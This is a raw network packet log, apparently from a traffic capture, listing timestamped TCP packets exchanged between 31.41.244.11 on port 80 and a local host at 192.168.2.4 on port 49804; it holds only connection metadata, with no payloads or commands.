Nov 5, 2024 18:46:10.546087027 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.546097994 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.546130896 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.546226025 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.546236038 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.546277046 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.546380043 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.546391010 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.546401024 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.546422005 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.546444893 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.546497107 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.546538115 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.546542883 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.546549082 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.546567917 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.546588898 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.546677113 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.546688080 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.546699047 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.546721935 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.546745062 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.546892881 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.546914101 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.546926022 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.546936035 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.546947002 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.546967983 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.547068119 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.547080040 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.547110081 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.547415018 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.547429085 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.547441006 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.547456026 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.547476053 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.547568083 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.547579050 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.547600985 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.547610998 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.547617912 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.547622919 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.547631025 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.547636986 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.547652960 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.547678947 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.547688961 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.547728062 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.547779083 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.547832012 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.547853947 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.547866106 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.547880888 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.547898054 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.547919035 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.557384968 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.557437897 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.557449102 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.557461023 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.557488918 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.557595015 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.557606936 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.557627916 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.557640076 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.557650089 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.557651997 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.557662010 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.557670116 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.557673931 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.557683945 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.557689905 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.557723045 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.557746887 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.557796001 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.557809114 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.557820082 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.557854891 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.557988882 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.558001041 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.558010101 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.558031082 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.558057070 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.558059931 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.558068037 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.558079004 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.558089972 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.558108091 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.558110952 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.558121920 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.558150053 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.558233976 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.558245897 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.558257103 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.558268070 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.558279037 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.558307886 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.558341026 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.558393955 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.558631897 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.558643103 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.558654070 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.558676004 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.558705091 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.558706045 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.558717966 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.558727980 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.558741093 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.558751106 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.558777094 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.558846951 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.558857918 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.558868885 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.558881044 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.558892012 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.558897972 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.558904886 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.558906078 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.558931112 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.558955908 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.558965921 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.558978081 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.559010029 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.559140921 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.559150934 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.559161901 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.559173107 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.559184074 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.559192896 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.559196949 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.559202909 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.559209108 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.559221029 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.559223890 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.559231997 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.559241056 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.559243917 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.559247017 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.559271097 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.559278011 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.559288025 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.559295893 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.559317112 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.559357882 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.559366941 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.559401989 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.559432030 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.559443951 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.559454918 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.559467077 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.559474945 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.559490919 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.559520006 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.559536934 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.559549093 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.559560061 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.559571028 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.559581041 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.559581995 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.559603930 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.559613943 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.559622049 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.559644938 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.559664965 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.559736013 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.559747934 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.559758902 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.559781075 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.559808969 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.559834003 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.559844971 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.559880972 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.559923887 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.559936047 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.559974909 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.560000896 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.560038090 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.560077906 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.560089111 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.560098886 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.560110092 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.560122967 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.560148001 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.560148954 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.560161114 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.560172081 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.560178995 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.560194969 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.560214996 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.560246944 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.560259104 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.560269117 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.560291052 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.560309887 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.564258099 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.564271927 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.564284086 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.564325094 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.564351082 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.564440966 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.564454079 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.564495087 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.564527988 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.564639091 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.564651012 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.564661026 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.564673901 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.564686060 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.564690113 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.564697027 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.564703941 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.564730883 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.564738035 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.564749956 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.564762115 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.564784050 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.565382004 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.565393925 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.565404892 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.565427065 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.565440893 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.565448999 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.565453053 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.565464973 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.565474987 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.565478086 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.565490007 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.565516949 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.565635920 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.565648079 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.565661907 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.565675020 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.565684080 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.565702915 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.565730095 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.565860033 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.565871000 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.565907001 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.566514969 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.566526890 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.566538095 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.566571951 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.566589117 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.566596031 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.566606998 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.566617966 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.566629887 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.566638947 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.566664934 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.566699982 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.566709042 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.566737890 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.566756964 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.567825079 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.567876101 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.567883015 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.567888975 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.567910910 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.567931890 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.567939043 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.567950964 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.567992926 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.568630934 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.568643093 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.568655014 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.568687916 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.568722963 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.569626093 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.569645882 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.569657087 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.569674015 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.569695950 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.569749117 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.569761038 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.569820881 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.569946051 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.569958925 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.569969893 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.570003986 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.570019007 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.570086002 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.570112944 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.570123911 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.570139885 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.570139885 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.570158005 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.571415901 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.571427107 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.571439028 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.571470976 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.571484089 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.571587086 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.571604013 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.571614981 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.571629047 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.571640968 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.572156906 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.572217941 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.572221041 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.572232008 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.572309971 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.572912931 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.572935104 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.572947025 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.572981119 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.572997093 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.573849916 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.573860884 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.573870897 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.573898077 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.573918104 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.574274063 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.574322939 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.574343920 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.574353933 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.574392080 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.574934959 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.574950933 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.574961901 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.574971914 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.574990034 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.575006962 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.575012922 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.575018883 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.575028896 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.575037003 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.575064898 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.575118065 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.575128078 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.575138092 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.575151920 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.575158119 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.575164080 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.575179100 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.575203896 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.575232983 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.575243950 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.575253963 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.575263977 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.575273991 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.575278044 CET	49804	80	192.168.2.4	31.41.244.11
